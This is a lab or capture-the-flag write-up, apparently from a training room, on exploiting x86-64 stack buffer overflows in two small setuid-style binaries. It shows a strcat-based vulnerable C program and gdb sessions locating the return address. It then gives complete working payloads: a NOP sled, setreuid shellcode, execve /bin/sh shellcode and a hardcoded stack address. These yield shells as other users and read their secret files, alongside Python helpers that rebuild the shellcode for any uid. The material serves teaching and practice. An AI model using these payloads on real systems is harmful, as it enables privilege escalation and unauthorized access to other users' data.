[user1@ip-10-10-144-140 overflow-3]$ ./buffer-overflow $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 8 + '\x98\xe2\xff\xff\xff\x7f')")
Here's a program that echo's out your input
������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAA�����
sh-4.2$ id
uid=1002(user2) gid=1001(user1) groups=1001(user1)
sh-4.2$ cat secret.txt  
omgyoudidthissocool!!
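The padding counts used in the three payloads of this section all follow from the same subtraction. The sketch below reproduces them, taking the offset of 152 from the observation that the 153rd character was the first to reach the return address; padding_needed is a hypothetical helper.

```python
OFFSET_TO_RETURN_ADDRESS = 152  # the 153rd byte was the first to reach the return address
NOP_COUNT = 90


def padding_needed(*shellcode_lengths):
    """Filler bytes required between the shellcode and the return address."""
    return OFFSET_TO_RETURN_ADDRESS - NOP_COUNT - sum(shellcode_lengths)


print(padding_needed(30))      # 32: first shellcode
print(padding_needed(40))      # 22: replacement shellcode
print(padding_needed(14, 40))  # 8: setreuid shellcode followed by the replacement shellcode
```

In each case the total, including the 6 address bytes, stays at the maximum payload size of 158.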

Buffer Overflows 2

Try to use your newly learnt buffer overflow techniques for this binary file:

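#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* declares strcat */

void concat_arg(char *string)
{
    char buffer[154] = "doggo";
    /* strcat performs no bounds check: this is the intended vulnerability */
    strcat(buffer, string);
    printf("new word is %s\n", buffer);
}

int main(int argc, char **argv)
{
    concat_arg(argv[1]);
    return 0;
}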

Firstly, we find that the return address is overwritten from the 164th character up to the 169th.

(gdb) run $(python -c "print('A' * 164)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A' * 164)")
new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000000000400041 in ?? ()
(gdb) run $(python -c "print('A' * 169)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('A' * 169)")
new word is doggoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA

Program received signal SIGSEGV, Segmentation fault.
0x0000414141414141 in ?? ()
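These offsets can be turned into the layout of the next payload with a little arithmetic. The sketch below uses the same NOP count and shellcode lengths as the previous section. The comment about a 160-byte buffer slot plus 8 bytes of saved rbp is only an assumption that happens to match the observed numbers.

```python
PREFIX = b"doggo"             # already in the buffer before strcat appends argv[1]
FIRST_OVERWRITING_CHAR = 164  # first argument character that reaches the return address

argument_bytes_before_return = FIRST_OVERWRITING_CHAR - 1
bytes_from_buffer_start = len(PREFIX) + argument_bytes_before_return
print(argument_bytes_before_return)  # 163
print(bytes_from_buffer_start)       # 168, consistent with 160 (154 rounded up to 16) + 8

NOP_COUNT = 90
SETREUID_LENGTH = 14
SHELL_LENGTH = 40
padding = argument_bytes_before_return - NOP_COUNT - SETREUID_LENGTH - SHELL_LENGTH
print(padding)                       # 19
```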

So let's craft a payload as before and adapt it to this binary:

(gdb) run $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + 'B' * 6)")
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/user1/overflow-4/buffer-overflow-2 $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xea\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + 'B' * 6)")
new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAABBBBBB

Program received signal SIGSEGV, Segmentation fault.
0x0000424242424242 in ?? ()

The return address is overwritten, so we just need to replace the B * 6 with a memory address that leads to the shellcode:

(gdb) x/100x $rsp-164
0x7fffffffe23c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe24c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe25c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe26c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe27c: 0x90909090      0x90909090      0x90909090      0x90909090
0x7fffffffe28c: 0x31909090      0xeabf66ff      0x58716a03      0x0ffe8948
0x7fffffffe29c: 0x583b6a05      0x49d23148      0x622f2fb8      0x732f6e69
0x7fffffffe2ac: 0xe8c14968      0x48504108      0x5752e789      0x0fe68948
0x7fffffffe2bc: 0x583c6a05      0x0fff3148      0x41414105      0x41414141
0x7fffffffe2cc: 0x41414141      0x41414141      0x41414141      0x42424242
0x7fffffffe2dc: 0x00004242      0xffffe3d8      0x00007fff      0x00000000
0x7fffffffe2ec: 0x00000002      0x004005e0      0x00000000      0xf7a4302a
0x7fffffffe2fc: 0x00007fff      0x00000000      0x00000000      0xffffe3d8
0x7fffffffe30c: 0x00007fff      0x00040000      0x00000002      0x004005ac
0x7fffffffe31c: 0x00000000      0x00000000      0x00000000      0xa5ce3cc0
0x7fffffffe32c: 0xe848714a      0x00400450      0x00000000      0xffffe3d0
0x7fffffffe33c: 0x00007fff      0x00000000      0x00000000      0x00000000
0x7fffffffe34c: 0x00000000      0x680e3cc0      0x17b78e35      0xf1ca3cc0
0x7fffffffe35c: 0x17b79e82      0x00000000      0x00000000      0x00000000
0x7fffffffe36c: 0x00000000      0x00000000      0x00000000      0xffffe3f0
0x7fffffffe37c: 0x00007fff      0xf7ffe130      0x00007fff      0xf7de7656
0x7fffffffe38c: 0x00007fff      0x00000000      0x00000000      0x00000000
0x7fffffffe39c: 0x00000000      0x00000000      0x00000000      0x00400450
0x7fffffffe3ac: 0x00000000      0xffffe3d0      0x00007fff      0x0040047a
0x7fffffffe3bc: 0x00000000      0xffffe3c8      0x00007fff      0xf7ffdf80

We can put the address 0x7fffffffe28c, which lies in the NOP sled just before the shellcode, at the end of our payload:

[user1@ip-10-10-64-110 overflow-4]$ ./buffer-overflow-2 $(python -c "print('\x90' * 90 + '\x31\xff\x66\xbf\xeb\x03\x6a\x71\x58\x48\x89\xfe\x0f\x05' + '\x6a\x3b\x58\x48\x31\xd2\x49\xb8\x2f\x2f\x62\x69\x6e\x2f\x73\x68\x49\xc1\xe8\x08\x41\x50\x48\x89\xe7\x52\x57\x48\x89\xe6\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05' + 'A' * 19 + '\x8c\xe2\xff\xff\xff\x7f')")
new word is doggo������������������������������������������������������������������������������������������1�f��jqXH��j;XH1�I�//bin/shI�APH��RWH��j<XH1�AAAAAAAAAAAAAAAAAAA�����
sh-4.2$ id
uid=1003(user3) gid=1001(user1) groups=1001(user1)
sh-4.2$ cat secret.txt 
wowanothertime!!

Note that the setreuid shellcode has changed slightly (\xeb\x03 instead of \xea\x03): the owner of secret.txt is user3, so the uid is 1003.
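The two differing bytes are the uid itself, stored as a 16-bit little-endian value inside the shellcode. The sketch below rebuilds the 14-byte sequence for a given uid. The setreuid_stub helper is hypothetical, and the instruction comments are my reading of the bytes, not pwntools output.

```python
import struct


def setreuid_stub(uid):
    """Rebuild the 14-byte setreuid shellcode shown earlier for a 16-bit uid."""
    return (
        b"\x31\xff"                             # xor edi, edi
        + b"\x66\xbf" + struct.pack("<H", uid)  # mov di, uid
        + b"\x6a\x71\x58"                       # push 0x71; pop rax (setreuid syscall number)
        + b"\x48\x89\xfe"                       # mov rsi, rdi
        + b"\x0f\x05"                           # syscall
    )


print(struct.pack("<H", 1002).hex())  # ea03
print(struct.pack("<H", 1003).hex())  # eb03
print(len(setreuid_stub(1003)))       # 14
```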